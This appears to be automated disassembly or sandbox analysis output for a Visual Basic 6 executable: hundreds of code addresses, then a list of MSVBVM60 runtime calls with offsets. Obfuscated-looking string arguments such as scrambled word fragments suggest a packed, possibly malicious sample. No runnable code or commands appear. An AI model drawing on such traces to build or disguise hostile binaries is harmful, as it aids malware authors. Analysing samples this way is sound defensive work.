0x0040f273
0x0040f278
0x0040f27b
0x0040f281
0x0040f286
0x0040f286
0x0040f26c
0x0040f295
0x0040f29c
0x0040f2a6
0x0040f2b6
0x0040f2b7
0x0040f2bf
0x0040f2c0
0x0040f2c5
0x0040f2cf
0x0040f2df
0x0040f2e0
0x0040f2e6
0x0040f2e7
0x0040f2ec
0x0040f2f9
0x0040f300
0x0040f301
0x0040f303
0x0040f308
0x0040f30b
0x0040f314
0x0040f316
0x0040f31d
0x0040f324
0x0040f329
0x0040f32e
0x0040f333
0x0040f335
0x0040f33a
0x0040f33a
0x0040f340
0x0040f347
0x0040f34c
0x0040f351
0x0040f358
0x0040f359
0x0040f35e
0x0040f368
0x0040f378
0x0040f379
0x0040f37f
0x0040f380
0x0040f385
0x0040f392
0x0040f3a0
0x0040f3a6
0x0040f3ad
0x0040f3bb
0x0040f3d8
0x0040f3bd
0x0040f3bd
0x0040f3c2
0x0040f3c7
0x0040f3cc
0x0040f3cc
0x0040f3ea
0x0040f3f0
0x0040f3fa
0x0040f404
0x0040f40e
0x0040f418
0x0040f422
0x0040f42c
0x0040f436
0x0040f440
0x0040f44a
0x0040f45e
0x0040f46b
0x0040f46c
0x0040f46d
0x0040f46e
0x0040f472
0x0040f47f
0x0040f480
0x0040f481
0x0040f482
0x0040f486
0x0040f493
0x0040f494
0x0040f495
0x0040f496
0x0040f49a
0x0040f4a7
0x0040f4a8
0x0040f4a9
0x0040f4aa
0x0040f4ae
0x0040f4bb
0x0040f4bc
0x0040f4bd
0x0040f4be
0x0040f4cd
0x0040f4d0
0x0040f4d2
0x0040f4df
0x0040f501
0x0040f4e1
0x0040f4e1
0x0040f4e3
0x0040f4e8
0x0040f4ee
0x0040f4f4
0x0040f4f9
0x0040f4f9
0x0040f50e
0x0040f514
0x0040f521
0x0040f527
0x0040f531
0x0040f534
0x0040f541
0x0040f542
0x0040f543
0x0040f544
0x0040f545
0x0040f547
0x0040f54a
0x0040f555
0x0040f555
0x0040f55a
0x0040f561
0x0040f567
0x0040f578
0x0040f57d
0x0040f5b2
0x0040f5b8
0x0040f5c5
0x0040f5e7
0x0040f5c7
0x0040f5c7
0x0040f5cc
0x0040f5d1
0x0040f5d4
0x0040f5da
0x0040f5df
0x0040f5df
0x0040f5f4
0x0040f5f9
0x0040f600
0x0040f60a
0x0040f620
0x0040f62b
0x0040f632
0x0040f633
0x0040f63e
0x0040f63f
0x0040f644
0x0040f64d
0x0040f654
0x0040f655
0x0040f657
0x0040f65c
0x0040f65f
0x0040f666
0x0040f670
0x0040f67a
0x0040f680
0x0040f681
0x0040f68e
0x0040f693
0x0040f694
0x0040f699
0x0040f6a0
0x0040f6a6
0x0040f6b3
0x0040f6be
0x0040f6c3
0x0040f6cc
0x0040f6ce
0x0040f6d5
0x0040f6dc
0x0040f6de
0x0040f6e3
0x0040f6e3
0x0040f6e6
0x0040f6ed
0x0040f6f7
0x0040f70d
0x0040f718
0x0040f71f
0x0040f720
0x0040f725
0x0040f72f
0x0040f73f
0x0040f740
0x0040f746
0x0040f747
0x0040f74c
0x0040f759
0x0040f760
0x0040f761
0x0040f763
0x0040f768
0x0040f774
0x0040f77a
0x0040f790
0x0040f796
0x0040f798
0x0040f7a5
0x0040f7c7
0x0040f7a7
0x0040f7a7
0x0040f7ac
0x0040f7b1
0x0040f7b4
0x0040f7ba
0x0040f7bf
0x0040f7bf
0x0040f7d5
0x0040f7f2
0x0040f7d7
0x0040f7d7
0x0040f7dc
0x0040f7e1
0x0040f7e6
0x0040f7e6
0x0040f804
0x0040f810
0x0040f816
0x0040f828
0x0040f82f
0x0040f843
0x0040f846
0x0040f848
0x0040f855
0x0040f877
0x0040f857
0x0040f857
0x0040f859
0x0040f85e
0x0040f864
0x0040f86a
0x0040f86f
0x0040f86f
0x0040f884
0x0040f884
0x0040f889
0x0040f890
0x0040f89a
0x0040f8af
0x0040f8e5
0x0040f8eb
0x0040f8f8
0x0040f91a
0x0040f8fa
0x0040f8fa
0x0040f8ff
0x0040f904
0x0040f907
0x0040f90d
0x0040f912
0x0040f912
0x0040f927
0x0040f92c
0x0040f933
0x0040f93d
0x0040f947
0x0040f94d
0x0040f94e
0x0040f95b
0x0040f960
0x0040f961
0x0040f966
0x0040f96d
0x0040f973
0x0040f980
0x0040f98b
0x0040f999
0x0040f99f
0x0040f9ad
0x0040f9ca
0x0040f9af
0x0040f9af
0x0040f9b4
0x0040f9b9
0x0040f9be
0x0040f9be
0x0040f9dc
0x0040f9f7
0x0040f9fa
0x0040f9fc
0x0040fa09
0x0040fa2b
0x0040fa0b
0x0040fa0b
0x0040fa0d
0x0040fa12
0x0040fa18
0x0040fa1e
0x0040fa23
0x0040fa23
0x0040fa38
0x0040fa4c
0x0040fa4f
0x0040fa51
0x0040fa5e
0x0040fa80
0x0040fa60
0x0040fa60
0x0040fa62
0x0040fa67
0x0040fa6d
0x0040fa73
0x0040fa78
0x0040fa78
0x0040fa8d
0x0040fa8d
0x0040fa92
0x0040fa99
0x0040faa3
0x0040faad
0x0040fab7
0x0040facd
0x0040fad8
0x0040fad9
0x0040fae1
0x0040fae8
0x0040fae9
0x0040faee
0x0040faf8
0x0040fb08
0x0040fb09
0x0040fb0f
0x0040fb10
0x0040fb15
0x0040fb22
0x0040fb29
0x0040fb30
0x0040fb31
0x0040fb33
0x0040fb38
0x0040fb3b
0x0040fb44
0x0040fb4a
0x0040fb51
0x0040fb5b
0x0040fb61
0x0040fb6b
0x0040fb75
0x0040fb7f
0x0040fb89
0x0040fb93
0x0040fb96
0x0040fba3
0x0040fba4
0x0040fba5
0x0040fba6
0x0040fba7
0x0040fbaa
0x0040fbb7
0x0040fbb8
0x0040fbb9
0x0040fbba
0x0040fbbd
0x0040fbbe
0x0040fbcb
0x0040fbcc
0x0040fbcd
0x0040fbce
0x0040fbcf
0x0040fbd1
0x0040fbd6
0x0040fbd9
0x0040fbde
0x0040fbde
0x0040fbe1
0x0040fbe8
0x0040fbed
0x0040fbf5
0x0040fbf7
0x0040fbfe
0x0040fc03
0x0040fc08
0x0040fc0a
0x0040fc0c
0x0040fc0c
0x0040fc11
0x0040fc18
0x0040fc2c
0x0040fc3c
0x0040fc41
0x0040fc8a
0x0040fc96
0x0040fca2
0x0040fca9
0x0040fcaa
0x0040fcac
0x0040fcb4
0x0040fcc2
0x0040fcdf
0x0040fcc4
0x0040fcc4
0x0040fcc9
0x0040fcce
0x0040fcd3
0x0040fcd3
0x0040fcf1
0x0040fd0c
0x0040fd0f
0x0040fd11
0x0040fd1e
0x0040fd40
0x0040fd20
0x0040fd20
0x0040fd22
0x0040fd27
0x0040fd2d
0x0040fd33
0x0040fd38
0x0040fd38
0x0040fd4d
0x0040fd68
0x0040fd6b
0x0040fd6d
0x0040fd7a
0x0040fd9c
0x0040fd7c
0x0040fd7c
0x0040fd7e
0x0040fd83
0x0040fd89
0x0040fd8f
0x0040fd94
0x0040fd94
0x0040fda9
0x0040fdaf
0x0040fdc2
0x0040fdcd
0x0040fdd2
0x0040fdd9
0x0040fdde
0x0040fdec
0x0040fdf8
0x0040fe02
0x0040fe07
0x0040fe0d
0x0040fe12
0x0040fe19
0x0040fe22
0x0040fe3f
0x0040fe50
0x0040fe67
0x0040fe6d
0x0040fe7a
0x0040fe9c
0x0040fe7c
0x0040fe7c
0x0040fe81
0x0040fe86
0x0040fe89
0x0040fe8f
0x0040fe94
0x0040fe94
0x0040fea9
0x0040feb2
0x0040feb5
0x0040febc
0x0040fec6
0x0040fed0
0x0040feda
0x0040feea
0x0040feeb
0x0040fef1
0x0040fef2
0x0040fef7
0x0040fefc
0x0040ff02
0x0040ff18
0x0040ff1e
0x0040ff20
0x0040ff2d
0x0040ff4f
0x0040ff2f
0x0040ff2f
0x0040ff34
0x0040ff39
0x0040ff3c
0x0040ff42
0x0040ff47
0x0040ff47
0x0040ff5d
0x0040ff7a
0x0040ff5f
0x0040ff5f
0x0040ff64
0x0040ff69
0x0040ff6e
0x0040ff6e
0x0040ff8c
0x0040ff98
0x0040ff9e
0x0040ffb0
0x0040ffb7
0x0040ffcb
0x0040ffce
0x0040ffd0
0x0040ffdd
0x0040ffff
0x0040ffdf
0x0040ffdf
0x0040ffe1
0x0040ffe6
0x0040ffec
0x0040fff2
0x0040fff7
0x0040fff7
0x0041000c
0x0041000c
0x00410011
0x00410018
0x0041001d
0x00410022
0x00410029
0x0041002b
0x00410032
0x00410039
0x0041003b
0x00410046
0x00410047
0x0041004c
0x0041004f
0x0041005c
0x0041005d
0x0041005e
0x0041005f
0x00410060
0x00410062
0x00410065
0x00410070
0x00410070
0x00410075
0x0041007c
0x00410086
0x0041009c
0x004100a7
0x004100ae
0x004100af
0x004100b4
0x004100be
0x004100ce
0x004100cf
0x004100d5
0x004100d6
0x004100db
0x004100e8
0x004100ef
0x004100f0
0x004100f2
0x00410103
0x00410109
0x00410110
0x0041011e
0x0041013b
0x00410120
0x00410120
0x00410125
0x0041012a
0x0041012f
0x0041012f
0x0041014d
0x00410153
0x0041015d
0x00410176
0x00410183
0x00410184
0x00410185
0x00410186
0x00410195
0x00410198
0x0041019a
0x004101a7
0x004101c9
0x004101a9
0x004101a9
0x004101ab
0x004101b0
0x004101b6
0x004101bc
0x004101c1
0x004101c1
0x004101d6
0x004101dc
0x004101e3
0x004101ef
0x004101f0
0x004101f0
0x004101f5
0x00410207
0x00410217
0x0041021c
0x00410231
0x0041026e
0x00410274
0x00410281
0x004102a3
0x00410283
0x00410283
0x00410288
0x0041028d
0x00410290
0x00410296
0x0041029b
0x0041029b
0x004102b0
0x004102b7
0x004102b8
0x004102be
0x004102bf
0x004102c1
0x004102c9
0x004102d0
0x004102d5
0x004102de
0x004102e4
0x004102eb
0x004102f9
0x00410316
0x004102fb
0x004102fb
0x00410300
0x00410305
0x0041030a
0x0041030a
0x00410328
0x00410343
0x00410346
0x00410348
0x00410355
0x00410377
0x00410357
0x00410357
0x00410359
0x0041035e
0x00410364
0x0041036a
0x0041036f
0x0041036f
0x00410384
0x004103a1
0x004103a4
0x004103a6
0x004103b3
0x004103d5
0x004103b5
0x004103b5
0x004103b7
0x004103bc
0x004103c2
0x004103c8
0x004103cd
0x004103cd
0x004103e3
0x004103f0
0x004103f0
0x004103f5
0x00410403
0x00410420
0x00410405
0x00410405
0x0041040a
0x0041040f
0x00410414
0x00410414
0x00410432
0x0041044d
0x00410450
0x00410452
0x0041045f
0x00410481
0x00410461
0x00410461
0x00410463
0x00410468
0x0041046e
0x00410474
0x00410479
0x00410479
0x0041048e
0x004104a9
0x004104af
0x004104b1
0x004104be
0x004104e3
0x004104c0
0x004104c0
0x004104c5
0x004104ca
0x004104d0
0x004104d6
0x004104db
0x004104db
0x004104f0
0x004104f6
0x00410509
0x00410514
0x00410519
0x00410520
0x0041052a
0x00410534
0x0041053a
0x0041053b
0x0041053d
0x0041054a
0x0041054f
0x00410550
0x00410555
0x0041055c
0x00410562
0x0041056f
0x0041057a
0x00410588
0x0041058a
0x00410591
0x00410598
0x0041059a
0x004105a5
0x004105a6
0x004105ab
0x004105ae
0x004105bb
0x004105bc
0x004105bd
0x004105be
0x004105bf
0x004105c1
0x004105c4
0x004105cf
0x004105cf
0x004105d4
0x004105db
0x004105e4
0x004105f3
0x00410604
0x0041064b
0x00410651
0x0041065e
0x00410680
0x00410660
0x00410660
0x00410665
0x0041066a
0x0041066d
0x00410673
0x00410678
0x00410678
0x0041068d
0x00410692
0x0041069c
0x004106a2
0x004106ac
0x004106b2
0x004106b3
0x004106bc
0x004106c3
0x004106ca
0x004106cd
0x004106d3
0x004106dd
0x004106e3
0x004106e4
0x004106ed
0x004106f4
0x004106fb
0x00410700
0x0041070b
0x0041070c
0x00410711
0x00410718
0x00410728
0x00410729
0x0041072f
0x00410730
0x00410735
0x00410742
0x00410750
0x00410756
0x0041075d
0x0041076b
0x00410788
0x0041076d
0x0041076d
0x00410772
0x00410777
0x0041077c
0x0041077c
0x0041079a
0x004107b5
0x004107b8
0x004107ba
0x004107c7
0x004107e9
0x004107c9
0x004107c9
0x004107cb
0x004107d0
0x004107d6
0x004107dc
0x004107e1
0x004107e1
0x004107f6
0x0041081b
0x0041081e
0x00410820
0x0041082d
0x0041084f
0x0041082f
0x0041082f
0x00410831
0x00410836
0x0041083c
0x00410842
0x00410847
0x00410847
0x0041085c
0x00410862
0x00410872
0x0041087d
0x0041087d
0x00410882
0x0041088b
0x00410890
0x004108a6
0x004108ac
0x004108ae
0x004108bb
0x004108dd
0x004108bd
0x004108bd
0x004108c2
0x004108c7
0x004108ca
0x004108d0
0x004108d5
0x004108d5
0x004108f9
0x004108ff
0x00410901
0x0041090e
0x00410930
0x00410910
0x00410910
0x00410915
0x0041091a
0x0041091d
0x00410923
0x00410928
0x00410928
0x00410937
0x0041093e
0x00410945
0x0041094c
0x0041095f
0x00410964
0x00410964
0x0041096b
0x00410975
0x00410991
0x0041099b
0x004109a0
0x004109af
0x004109b5
0x004109bc
0x004109c6
0x004109d0
0x004109d6
0x004109d7
0x004109d9
0x004109e6
0x004109eb
0x004109ec
0x004109f1
0x004109f8
0x004109fe
0x00410a0b
0x00410a16
0x00410a24
0x00410a26
0x00410a2d
0x00410a34
0x00410a36
0x00410a41
0x00410a42
0x00410a47
0x00410a4a
0x00410a57
0x00410a58
0x00410a59
0x00410a5a
0x00410a5b
0x00410a5d
0x00410a60
0x00410a6b
0x00410a6b
0x00410a70
0x00410a77
0x00410a81
0x00410a8b
0x00410a8d
0x00410a93
0x00410a94
0x00410a9e
0x00410aa9
0x00410aae
0x00410ab5
0x00410ab7
0x00410ab9
0x00410abb
0x00410ac0
0x00410ac5
0x00410aca
0x00410ad1
0x00410adb
0x00410ae8
0x00410ae9
0x00410aef
0x00410af0
0x00410afa
0x00000000
0x00000000
0x00410afc
0x00410b01
0x00410b08
0x00410b12
0x00410b12
0x00410b13
0x00410b21
0x00410b24
0x00000000
0x004106ef
0x00000000
0x004106be
0x00410b2a
0x00410b31
0x00410b32
0x00410b9a
0x00410ba2
0x00410baa
0x00410bb2
0x00410bba
0x00410bc2
0x00410bc7
0x00410bcb
0x00410bcd
0x00410bd5
0x00410bdd
0x00410be5
0x00410bed
0x00410bf2
0x00410bf5
0x00410bf6
0x00410bf8
0x00410c00
0x00410c0b
0x00410c16
0x00410c21
0x00410c2c
0x00410c31

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 0040EE87
#588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,00401486), ref: 0040EED1
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00000002,00000001,00000000,?,?,?,?,00401486), ref: 0040EF02
__vbaLateMemCallLd.MSVBVM60(?,?,UULjaijLMUuw190,00000000), ref: 0040EF3F
__vbaObjVar.MSVBVM60(00000000,?,?,?,00401486), ref: 0040EF48
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,00401486), ref: 0040EF55
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000000C), ref: 0040EF90
__vbaFreeObj.MSVBVM60(00000000,?,0040DDDC,0000000C), ref: 0040EFAA
__vbaFreeVar.MSVBVM60(00000000,?,0040DDDC,0000000C), ref: 0040EFB5
__vbaVarDup.MSVBVM60 ref: 0040EFE1
#591.MSVBVM60(?), ref: 0040EFED
__vbaStrMove.MSVBVM60(?), ref: 0040EFFA
__vbaStrCmp.MSVBVM60(String,00000000,?), ref: 0040F005
__vbaFreeStr.MSVBVM60(String,00000000,?), ref: 0040F01F
__vbaFreeVar.MSVBVM60(String,00000000,?), ref: 0040F02A
#569.MSVBVM60(00000061,String,00000000,?), ref: 0040F04A
__vbaI4Str.MSVBVM60(0040DE98,String,00000000,?), ref: 0040F061
#697.MSVBVM60(00000000,0040DE98,String,00000000,?), ref: 0040F067
__vbaStrMove.MSVBVM60(00000000,0040DE98,String,00000000,?), ref: 0040F074
__vbaStrCmp.MSVBVM60(0040DEA4,00000000,00000000,0040DE98,String,00000000,?), ref: 0040F07F
__vbaFreeStr.MSVBVM60(0040DEA4,00000000,00000000,0040DE98,String,00000000,?), ref: 0040F099
#571.MSVBVM60(0000005E,0040DEA4,00000000,00000000,0040DE98,String,00000000,?), ref: 0040F0B9
__vbaStrCopy.MSVBVM60 ref: 0040F101
__vbaFreeStr.MSVBVM60 ref: 0040F174
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0040F1D2
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0040F1D7
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040F219
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA14,00000084), ref: 0040F281
#607.MSVBVM60(?,00000001,00000002), ref: 0040F2C0
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0040F2E7
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F303
__vbaInStr.MSVBVM60(00000000,KLARLG,moderskabernes,FFEA4050,?,?,?,?,?,00401486), ref: 0040F335
__vbaI4Str.MSVBVM60(0040DE98,?,?,?,?,?,00401486), ref: 0040F34C
#698.MSVBVM60(?,00000000,0040DE98,?,?,?,?,?,00401486), ref: 0040F359
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0040F380
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0040F392
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00008008,?), ref: 0040F3C7
__vbaChkstk.MSVBVM60(?), ref: 0040F45E
__vbaChkstk.MSVBVM60(?), ref: 0040F472
__vbaChkstk.MSVBVM60(?), ref: 0040F486
__vbaChkstk.MSVBVM60(?), ref: 0040F49A
__vbaChkstk.MSVBVM60(?), ref: 0040F4AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000044), ref: 0040F4F4
__vbaChkstk.MSVBVM60(00000000,?,0040DDDC,00000044), ref: 0040F534
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0040F54A
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0040F555
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0040F578
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA44,000006F8), ref: 0040F5DA
__vbaFreeStr.MSVBVM60(00000000,?,0040DA44,000006F8), ref: 0040F5F4
__vbaVarDup.MSVBVM60(00000000,?,0040DA44,000006F8), ref: 0040F620
#687.MSVBVM60(?,?), ref: 0040F633
__vbaDateVar.MSVBVM60(?,?,?), ref: 0040F63F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0040F657
#572.MSVBVM60(00000002), ref: 0040F681
__vbaStrMove.MSVBVM60(00000002), ref: 0040F68E
__vbaStrCmp.MSVBVM60(0040DF58,00000000,00000002), ref: 0040F699
__vbaFreeStr.MSVBVM60(0040DF58,00000000,00000002), ref: 0040F6B3
__vbaFreeVar.MSVBVM60(0040DF58,00000000,00000002), ref: 0040F6BE
#568.MSVBVM60(00000014,0040DF58,00000000,00000002), ref: 0040F6DE
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040DF58,00000000,00000002), ref: 0040F70D
#547.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DF58), ref: 0040F720
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002), ref: 0040F747
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 0040F763
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA14,00000160), ref: 0040F7BA
__vbaNew2.MSVBVM60(0040DDEC,0041331C), ref: 0040F7E1
__vbaObjSet.MSVBVM60(?,?,Moaria), ref: 0040F82F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000040), ref: 0040F86A
__vbaFreeObj.MSVBVM60(00000000,?,0040DDDC,00000040), ref: 0040F884
__vbaStrCopy.MSVBVM60 ref: 0040F8AF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA44,000006FC), ref: 0040F90D
__vbaFreeStr.MSVBVM60(00000000,?,0040DA44,000006FC), ref: 0040F927
#574.MSVBVM60(00000002), ref: 0040F94E
__vbaStrMove.MSVBVM60(00000002), ref: 0040F95B
__vbaStrCmp.MSVBVM60(0040DFC0,00000000,00000002), ref: 0040F966
__vbaFreeStr.MSVBVM60(0040DFC0,00000000,00000002), ref: 0040F980
__vbaFreeVar.MSVBVM60(0040DFC0,00000000,00000002), ref: 0040F98B
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040DFC0,00000000,00000002), ref: 0040F9B9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DDDC,0000001C), ref: 0040FA1E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000050), ref: 0040FA73
__vbaFreeObj.MSVBVM60(00000000,?,0040DE3C,00000050), ref: 0040FA8D
__vbaVarDup.MSVBVM60(0040DFC0,00000000,00000002), ref: 0040FACD
#632.MSVBVM60(?,00000002,00000002,00000002,0040DFC0,00000000,00000002), ref: 0040FAE9
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000002,00000002,00000002,0040DFC0,00000000,00000002), ref: 0040FB10
__vbaFreeVarList.MSVBVM60(00000003,00000002,00000002,?,00008008,?,?,00000002,00000002,00000002,0040DFC0,00000000,00000002), ref: 0040FB33
__vbaChkstk.MSVBVM60 ref: 0040FB96
__vbaChkstk.MSVBVM60 ref: 0040FBAA
__vbaChkstk.MSVBVM60 ref: 0040FBBE
__vbaLateMemCall.MSVBVM60(?,R8RKPuezMDYUe6qnGrDitDuDZFS86,00000003), ref: 0040FBD9
__vbaLenBstr.MSVBVM60(0040E070,?,?,?,?,?,?,?,?,00000000,0040DE98), ref: 0040FBED
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000090,Hemathidrosis8,0040E070,?,?,?,?,?,?,?,?,00000000,0040DE98), ref: 0040FC0C
__vbaStrCopy.MSVBVM60 ref: 0040FC2C
__vbaStrCopy.MSVBVM60 ref: 0040FC3C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FCAC
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,?,0040E070,?,?,?,?,?,?,?,?,00000000,0040DE98), ref: 0040FCCE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 0040FD33
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDFC,00000058), ref: 0040FD8F
__vbaStrMove.MSVBVM60(00000000,?,0040DDFC,00000058), ref: 0040FDC2
__vbaFreeObj.MSVBVM60(00000000,?,0040DDFC,00000058), ref: 0040FDCD
#554.MSVBVM60(00000000,?,0040DDFC,00000058), ref: 0040FDD9
#612.MSVBVM60(?), ref: 0040FDEC
__vbaStrVarMove.MSVBVM60(?,?), ref: 0040FDF8
__vbaStrMove.MSVBVM60(?,?), ref: 0040FE02
__vbaFreeVar.MSVBVM60(?,?), ref: 0040FE0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA44,00000700,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FE8F
__vbaVarTstNe.MSVBVM60(00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FEF2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA14,00000160,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FF42
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FF69
__vbaObjSet.MSVBVM60(?,?,Skamsttter8,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FFB7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DDDC,00000040,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FFF2
__vbaFreeObj.MSVBVM60(?,00002F1F,?,?,Circuted,?,?,?), ref: 0041000C
__vbaStrCmp.MSVBVM60(0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 00410022
#716.MSVBVM60(?,isogamous,00000000,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 00410047
__vbaChkstk.MSVBVM60(?,isogamous,00000000,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0041004F
__vbaLateIdSt.MSVBVM60(?,00000000,?,isogamous,00000000,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?), ref: 00410065
__vbaFreeVar.MSVBVM60(?,00000000,?,isogamous,00000000,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?), ref: 00410070
__vbaVarDup.MSVBVM60(0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0041009C
#544.MSVBVM60(?,?,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 004100AF
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 004100D6
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,0040E124,0040E124,00008002,00000008,?,00002F1F,?,?,Circuted), ref: 004100F2
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,?,?,?,?,0040E070,?,?,?,?,?,?,?,?), ref: 0041012A
__vbaChkstk.MSVBVM60(00000590,?), ref: 00410176
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000034), ref: 004101BC
__vbaObjSet.MSVBVM60(?,?), ref: 004101F0
__vbaStrCopy.MSVBVM60(?,?,?,?,?,0040E070,?,?,?,?,?,?,?,?,00000000,0040DE98), ref: 00410207
__vbaStrCopy.MSVBVM60(?,?,?,?,?,0040E070,?,?,?,?,?,?,?,?,00000000,0040DE98), ref: 00410217
__vbaStrCopy.MSVBVM60(?,?), ref: 00410231
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA44,00000704), ref: 00410296
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004102C1
#516.MSVBVM60(0040DEA4,?,?,?,?,?,?,?,?,?,0040E070), ref: 004102D5
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040DEA4,?,?,?,?,?,?,?,?,?,0040E070), ref: 00410305
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000001C), ref: 0041036A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000064), ref: 004103C8
__vbaFreeObj.MSVBVM60(00000000,?,0040DE3C,00000064), ref: 004103F0
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040DEA4,?,?,?,?,?,?,?,?,?,0040E070), ref: 0041040F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 00410474
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDFC,00000130), ref: 004104D6
__vbaStrMove.MSVBVM60(00000000,?,0040DDFC,00000130), ref: 00410509
__vbaFreeObj.MSVBVM60(00000000,?,0040DDFC,00000130), ref: 00410514
#606.MSVBVM60(00000001,00000002), ref: 0041053D
__vbaStrMove.MSVBVM60(00000001,00000002), ref: 0041054A
__vbaStrCmp.MSVBVM60(0040DEC8,00000000,00000001,00000002), ref: 00410555
__vbaFreeStr.MSVBVM60(0040DEC8,00000000,00000001,00000002), ref: 0041056F
__vbaFreeVar.MSVBVM60(0040DEC8,00000000,00000001,00000002), ref: 0041057A
#716.MSVBVM60(00000002,Outpushed1,00000000,0040DEC8,00000000,00000001,00000002), ref: 004105A6
__vbaChkstk.MSVBVM60(00000002,Outpushed1,00000000,0040DEC8,00000000,00000001,00000002), ref: 004105AE
__vbaLateIdSt.MSVBVM60(?,00000000,00000002,Outpushed1,00000000,0040DEC8,00000000,00000001,00000002), ref: 004105C4
__vbaFreeVar.MSVBVM60(?,00000000,00000002,Outpushed1,00000000,0040DEC8,00000000,00000001,00000002), ref: 004105CF
__vbaStrCopy.MSVBVM60(0040DEC8,00000000,00000001,00000002), ref: 00410604
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA44,00000708), ref: 00410673
__vbaFreeStr.MSVBVM60(00000000,?,0040DA44,00000708), ref: 0041068D
#556.MSVBVM60(00006003), ref: 004106B3
#556.MSVBVM60(00006003,00006003), ref: 004106E4
#692.MSVBVM60(00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 0041070C
__vbaVarTstNe.MSVBVM60(00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 00410730
__vbaFreeVar.MSVBVM60(00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 00410742
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 00410777
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DDDC,0000004C), ref: 004107DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E234,00000024), ref: 00410842
__vbaStrMove.MSVBVM60(00000000,?,0040E234,00000024), ref: 00410872
__vbaFreeObj.MSVBVM60(00000000,?,0040E234,00000024), ref: 0041087D
__vbaOnError.MSVBVM60(000000FF,00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 0041088B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA14,000001B8), ref: 004108D0
__vbaFreeObj.MSVBVM60(00410C32), ref: 00410B9A
__vbaFreeObj.MSVBVM60(00410C32), ref: 00410BA2
__vbaFreeVar.MSVBVM60(00410C32), ref: 00410BAA
__vbaFreeStr.MSVBVM60(00410C32), ref: 00410BB2
__vbaFreeVar.MSVBVM60(00410C32), ref: 00410BBA
__vbaFreeStr.MSVBVM60(00410C32), ref: 00410BC2
